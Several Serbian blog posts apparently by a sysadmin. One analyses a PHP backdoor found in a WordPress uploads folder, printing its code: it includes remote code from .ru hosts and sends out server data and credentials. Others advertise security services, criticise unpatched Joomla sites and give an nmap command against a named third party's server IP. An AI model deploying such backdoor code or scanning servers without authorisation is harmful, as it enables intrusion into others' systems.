Upadnem malopre sasvim slučajno u svoj wp-contents/uploads/ folder, kad ima šta i da vidim tamo: Dva PHP fajla, jedan base.php i jedan create.php, kao i jedan .htaccess fajl koji usmerava sve 404 greške na create.php. Budem radoznao, otvorim ih kad ono “obfuscated” kod, odnosno nije toliko obfuscated koliko je sve napisano u jednom redu. Ne budem lenj, otvorim ih preko PHPEdit-a koji sam dobio ranije (i za koji sam još uvek dužan da napišem review), odradim ctrl+shift+f (code beautifier) i dobijem lepo ispisan kod:
base.php
error_reporting(0); if (isset($_POST["l"]) and isset($_POST["p"])) { if (isset($_POST["input"])) { $user_auth = "&l=" . base64_encode($_POST["l"]) . "&p=" . base64_encode(md5($_POST["p"])); } else { $user_auth = "&l=" . $_POST["l"] . "&p=" . $_POST["p"]; } } else { $user_auth = ""; } if (!isset($_POST["log_flg"])) { $log_flg = "&log"; } if (!@include_once(base64_decode("aHR0cDovLw==") . "hegfzzazbzbcd" . base64_decode("LnVzZXJzLmJpc2hlbGwucnU=") . "/?r_addr=" . sprintf("%u", ip2long(getenv(REMOTE_ADDR))) . "&url=" . base64_encode($_SERVER["SERVER_NAME"] . $_SERVER[REQUEST_URI]) . $user_auth . $log_flg)) { if ($_POST["l"] == "special") { print "sys_active" . `uname -a`; } }create.php
error_reporting(0); $s = "e"; $a = (isset($_SERVER["HTTP_HOST"]) ? $_SERVER["HTTP_HOST"] : $HTTP_HOST); $b = (isset($_SERVER["SERVER_NAME"]) ? $_SERVER["SERVER_NAME"] : $SERVER_NAME); $c = (isset($_SERVER["REQUEST_URI"]) ? $_SERVER["REQUEST_URI"] : $REQUEST_URI); $d = (isset($_SERVER["PHP_SELF"]) ? $_SERVER["PHP_SELF"] : $PHP_SELF); $e = (isset($_SERVER["QUERY_STRING"]) ? $_SERVER["QUERY_STRING"] : $QUERY_STRING); $f = (isset($_SERVER["HTTP_REFERER"]) ? $_SERVER["HTTP_REFERER"] : $HTTP_REFERER); $g = (isset($_SERVER["HTTP_USER_AGENT"]) ? $_SERVER["HTTP_USER_AGENT"] : $HTTP_USER_AGENT); $h = (isset($_SERVER["REMOTE_ADDR"]) ? $_SERVER["REMOTE_ADDR"] : $REMOTE_ADDR); $str = base64_encode($a) . "." . base64_encode($b) . "." . base64_encode($c) . "." . base64_encode($d) . "." . base64_encode($e) . "." . base64_encode($f) . "." . base64_encode($g) . "." . base64_encode($h) . ".$s"; if ((include(base64_decode("aHR0cDovLw==") . "hegfzzazbzbcd" . base64_decode("LnVzZXJzLnBocGZyZWUucnU=") . "/?" . $str))) { } else { include(base64_decode("aHR0cDovLw==") . "hegfzzazbzbcd" . base64_decode("LnVzZXJzLnBocGNvZGluZy5ydQ==") . "/?" . $str); }Sve ovo što je base64_decode echo-ujem i vidim da je skripta napravljena da cross-site inkluduje u ovu skriptu štagod joj se prosledi sa http://hegfzzazbzbcd.users.phpfree.ru/, odnosno sa http://hegfzzazbzbcd.users.phpcoding.ru ako ne uspe sa ove prve adrese - klasičan backdoor. Nemam pojma od kad to stoji na blogu, niti imam pojma otkud to kod mene u uploads/ folderu, i čudim se kako do sad bRlog nije deface-ovan, ali sad i da hoće neko preko toga da ga deface-uje - ne može, jer sam izbrisao skripte, i sprečio izvršavanje php skripti u uploads/ folderu.
A sad me izvin’te, odoh da proverim ostale blogove, što savetujem i vama.
Da ne odgovaram u vidu komentara jer to onda neće biti svima vidljivo. Već me je gomila ljudi pitala koliko košta usluga koju sam ponudio nešto ranije. Cena zavisi od posla koji treba obaviti. Sledi lista šta sve mogu da odradim pa se vi nađite na listi.:) - Joomla! sajt auditing - pregled već postavljene Joomla! prezentacije i primena sredstava za povećanje bezbednosti. - Pen test servera - provera bezbednostni celog servera i dostavljanje dokumentacije i propustima kao i o rešenjima za iste. - Auditing servera - ukoliko koristite VPS ili dedicated server odradiću kompletan test, update, audit proces i zatvaranje rupa na čitavom serveru - ovo se na odnosi na UNIX i sisteme na bazi UNIXa - BSD, GNU/Linux, Solaris, AIX bla, bla… - Bilo šta što ima veze sa bezbednošću sajta i/ili čitavog servera. Server ovde podrazumeva: web server, DB server, mail server, FTP server… ma bilo šta. Zapravo, možemo se dogovoriti za bilo koji tip usluga bez obzira da li treba pregledati Joomla!, Drupal, WP ili neki vaš lični CMS. Meni je to sve isto. P.S. Par ljudi iz nekih firmi su mi tražili CV da bi objasnili šefovima koga bi to da unajme. Izvol’te: http://rehash.eccegeek.info/files/marko_cv.pdf
Dan prvi "Hakovana mi je Joomla! Šta da radim?" "Ne brinite. Mi ćemo Vam je srediti i vratiti u prethodno stanje." Nekoliko minuta kasnije pošto je vraćen backup i provaljeno da korisnik ima Joomla! 1.5.1. "Poštovani, prezentacija Vam je vraćena. Ipak, bilo bi pametno da uradite ažuriranje na novu verziju. Ovih dana je izašla zakrpa koja rešava baš problem koji imate." "Aha. Hvala puno. Evo odmah."Dan drugi "Opet mi je hakovna Joomla!" "Jeste li uradili ažuriranje na novu verziju?"(dok se postavlja to pitanje proverava se sajt - naravno da nije ažuriran sistem) "Ah. Nisam. A trebalo je?" I tako već skoro 10 dana. Trudim se da nađem razumevanje za ovakvo ponašanje. Ali mi nekako ne ide. Zato obaveštavam javnost, kako fizička lica tako i firme, koju mrzi da čita šta pišemo na Joomla! Serbia forumu da sam odlučio da ponudim uslugu profesionalnog Joomla! konsultovanja. Ukoliko nećete sami da lupate glavu kako da povećate bezbednost svog sistema i kako da održavate ceo sajt slobodno mi se obratite i ja ću vam za ne tako visoku cenu odraditi sve što je potrebno da malo mirnije spavate. A možemo se dogovoriti i za stalno održavanje. Zapravo, šta god je potrebno samo da se ne ponavljaju razgovori odozgo. Moja email adresa je: marko[at]joomlaserbia.com pa mi se slobodno javite.
Uvek se slatko nasmejem kada čujem za sve te "hakerske" napade. U poslednjih par dana to je jedna od najvrelijih vesti većine domaćih medija. "Razvaljeni" su sajt SPC-a, Ministarstva poljoprivrede, raznih firmi, političkih partija i sl. Gotovo svi sajtovi su dobili identično novo ruho u bojama plemena sa juga. No, dva najzabavnija su osvanula na B92 sajtu: Sajtovi bez zaštite od upada hakera i Novi napad hakera sa Kosova. Hakeri, hakeri, hakeri… nije nego. Hajde da uradimo malu regresiju i pogledamo onako forenzički šta se tu sve dešavalo. Ako malo pažljivije izanaliziramo sve te žrtve moćićemo da izvedemo sledeći zaključak: 90% njih čine Joomla! 1.5.x instalacije. Ok. Dakle Joomla! je grozna i ona je kriva za sve, jel tako? Možda bih i progutao tu priču da kojim slučajem ne radim za Joomla! tim od nultog dana postojanja dotičnog CMS-a. Bez trunke pristrasnosti smem reći da ovog puta Joomla! nije kriva. Svi ovi slučajevi su školski primer ljudskog faktora kao problema u bezbednosti. Ali ne, ovog puta nije bilo naprednih NLP tehnika kako bi se jadni korisnici prevarili. Ne, ovog puta su ti jadni korisnici pogazili ono zlatno pravilo upotrebe gotovih softverskih rešenja za izradu web prezentacija. Ne jednom sam za vreme Joomla! dana u Beogradu prošle godine rekao da je jako važna stvar koristiti najnoviju verziju Joomla! softvera. Mislim da sam i zidovima u Rexu dosadio ponavljajući to. Pošto u Srbiji svi znaju da prave sajtove i svi se razumeju u sve što ima veze sa online postojanjem tako smo se našli u sledećoj situaciji: oborene desetine satova u neverovatno kratkom vremenskom roku. Opasni neki hakeri? Ne bih rekao. Vrli admini dotičnih sajtova su valjda bili previše zauzeti da bi brinuli o bezbednosti svojih kreacija pa smo tako mogli da vidimo Joomla! sajtove koji koriste i po 6 meseci stare verzije Joomla!. Sve što osoba zadužena za život tog Joomla! sajta treba da radi jeste da bar jednom u nedelju dana ode na Joomla! glavni sajt ili Joomla! Srbija forum i vidi da li se dešava nešto jako važno. Ali ne! Mnogo je lakše postaviti i zaboraviti. Bitno je da radi. Dragi moji web stručnjaci, softver je živo biće. On se konstantno razivija i unapređuje. Posebno ako koristite neki jako živ projekat kakvi su Joomla!, phpBB ili WordPress. Apsurdno je očekivati da jednom napisan sistem ostane nepromenjen i bezbedan zauvek. Softver nije savršen i kako stvari stoje to neće ni postati u skorije vreme. Već dva meseca radim kao stariji sistem administrator u SezamPro hostingu. Firma ima ogroman broj sajtova i neki od sajtova koji su našli svoje mesto na listi napada se nalaze kod nas. Tako sam imao priliku da pogledam šta se vrtelo na tim sajtovima kada su "odvaljeni" i da pomognem korisnicima da povrate svoje prezentacije. Prva stvar koju sam radio kada bi mi javili da je taj i taj sajt srušen jeste provera fajla CHANGELOG.php koji ima svaka Joomla!. Od 10 pregledanih sajtova ni jedan nije imao najnoviju verziju Joomla! Da stvar bude zabavnija, svi sajtovi su u proseku koristili Joomla! 1.5.x iz februara 2008. Ako znamo da je pre nedelju dana objavljena hitna zakrpa u vidu verzije 1.5.6 onda je krajnje interesantno kako to da niko nije ažurirao svoj sajt. Neko mi onda reče da je možda komplikovana procedura za ažuriranje. Hmmm… hajde da je razmotrimo u nekoliko koraka: 1. Odlazak na Joomla! sajt i preuzimanja fajla koji se zove: Patch_1.5.x_to_1.5.6.zip. gde umesto ovog X stoji verzija Joomla! koju trenutno imate. Ako baš ne znate koja je uđete u svoj admin panel i gore desno jasno stoji potrebna informacija. 2. Raspakujete preuzetu arhivu na svom računaru. 3. Koristeći omiljeni program za FTP nakačite se na svoj sajt, uđete u direktorijum sa sajtom i prevučete sve datoteke iz arhive sa svoje mašine na sajt. Program će vas pitati da li želite da pregazite sve datoteke i vi ćete reći DA. 4. Nema 4. Ažuriranje je gotovo. I takooo… Bezbednosna kultura na srpskoj interenet sceni je toliko niska da je apsolutno sjajno što neko i ima sajt koji se ne obara par puta dnevno. Idemo dalje. Naslovna strana Gazete od četvrtka, ako se ne varam, govori o pornografiji na sajtu jedne osnovne škole. "Stručnjaci" koje su kontaktirali iz dotičnog lista su komentarisali kako su hakeri napunili stranice tog sajta materijalom od kog bi se i markiz De Sad zacrveneo. Opet mene cimaju jer je sajt na našim serverima. Alatke u ruke pa u glib. Rezultat: na samom sajtu nije bilo nikakvog pornografskog sadržaja ali je zato forum bio urnisan. Nije mi bilo potrebno ne znam kakvo znanje da bih sračunao da dotični forum ima oko 100 korisnika od kojih skoro 80 čine botovi. Za neupućene, botovi su programi koji sami krstare Interenetom i obavljaju zadatke za koje su isprogramirani. Sledeća stvar koja mi pada u oči jeste činjenica da je na sajtu phpBB2 koji nije ažuriran ko zna od kada. Sećate se kada su pre par godina phpBB2 forumi padali kao zrele kruške? Izgleda da admin ovog foruma nije čuo za to. Ako pak problem ne bude u softveru na sajtu onda obično bude do samog servera tj. opet lenjosti admina da ponekad proveri da li mu je softver možda bušan ili loše podešen. Primer - sajt SPC. Nalazi se na dedicated serveru u USA a za pokretanje sajta koriste Drupal ako se ne varam. Posle pada su lepo počistili kod kako bi se sakrilo koji se CMS tu vrti. Što je super. Ipak, to nije dovoljno. Drupal tim, kao i Joomla!, u poslednje vreme često izdaje zakrpe koje bi valjalo primenjivati. Pošto sajt SPC-a ima svoj server nisam mogao da odolim i da ne pogledam malo sam server. Samo ću reći: nmap -sS -sV -O 74.53.26.200 i sve će vam se samo kazati. Neko je mogao malo više da poradi na bezbednosti ovog servera. Baš sam se raspisao, zar ne? Žao mi je ako sam vas smorio ali mi je preko glave naslova u medijima i priča o hakerima. Kakvi bre hakeri? Svaki klinac je mogao da nađe exploit za problem u Joomla! za sve verzije pre 1.5.6. i da se uloguje kao administrator. Problem nije u softveru već u lenjim korisnicima. Ažurirajte softver. Pravite rezervne kopije na dnevnoj bazi. Ako vam je sajt izuzetno posećen onda rezervne kopije treba praviti i češće. Primenite makar minimum bezbednosnih podešavanja za koja uputstva imate na svim matičnim sajtovma CMS-ova koje koristite. Ili unajmite nekog ko se zapravo razume u posao bezbednosti sajtova i servera.Mental note: Otvoriti firmu za security consulting.:)P.S. Dok ovo pišem čujem kako je jedan od sajtova koji je bio "srušen" prošle nedelje a koji smo vratili u život opet pao. Kako se ispostavilo korisnik nije našao za shodno da uradi update iako mu je predočeno u čemu je bio problem. Ahhh… the road to stupid is paved with good intention.
